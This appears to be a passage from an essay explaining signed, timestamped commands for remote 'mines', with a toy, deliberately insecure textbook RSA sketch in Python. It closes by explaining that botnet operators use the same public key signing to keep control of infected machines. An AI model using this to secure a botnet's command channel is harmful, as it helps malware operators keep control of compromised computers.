I would issue a command, along with a timestamp, and maybe even a nonce that could double as a global identifier for the command, and sign the whole deal using my private key. On each mine I would store the public key. When a command is received, the mines would check the signature before executing the command. I could then issue repeat commands, as the timestamps would change each time. An adversary learns nothing when a command is issued, because the timestamps would make any replay attacks useless.
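
To make the flow concrete, here is a toy sketch in Python. It uses unpadded textbook RSA with a tiny key built from two Mersenne primes, which is not secure and only stands in for a real signature scheme. The Mine class, the message layout, and the rule that a mine accepts only timestamps newer than the last one it accepted are all assumptions for illustration. The modular inverse via pow needs Python 3.8 or later.

```python
import hashlib

# Toy key material (illustrative only, far too small for real use).
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q          # public modulus, stored on every mine
E = 65537          # public exponent, stored on every mine
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent, never leaves the owner


def digest(command: str, timestamp: int, nonce: str, n: int) -> int:
    """Hash the command, timestamp, and nonce together, reduced below the modulus."""
    message = f"{command}|{timestamp}|{nonce}".encode("utf-8")
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(command: str, timestamp: int, nonce: str) -> int:
    """Owner side: sign with the private exponent."""
    return pow(digest(command, timestamp, nonce, N), D, N)


class Mine:
    """Holds only public values, so a captured mine reveals no secret."""

    def __init__(self, n: int, e: int) -> None:
        self.n = n
        self.e = e
        self.last_timestamp = -1

    def receive(self, command: str, timestamp: int, nonce: str, signature: int) -> bool:
        # Stale or repeated timestamps are treated as replays.
        if timestamp <= self.last_timestamp:
            return False
        # Verify the signature using the public key alone.
        if pow(signature, self.e, self.n) != digest(command, timestamp, nonce, self.n):
            return False
        self.last_timestamp = timestamp
        return True  # a real mine would execute the command here
```

A command signed once is accepted once. Replaying the same broadcast fails the timestamp check, and altering the command fails the signature check.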

Minefields just like this exist today all over the Internet, as botnets. Thousands of computers all around the world become infected with malware and come under the control of a single individual or group. Individual machines in the botnet could be taken out, but removing the entire botnet is difficult as it grows and repairs itself. Any security researcher could disassemble the botnet malware and learn everything about it, so the malware can store no secrets. How does a malicious person control the botnet, then, without someone else taking control? Public key cryptography, just as described above.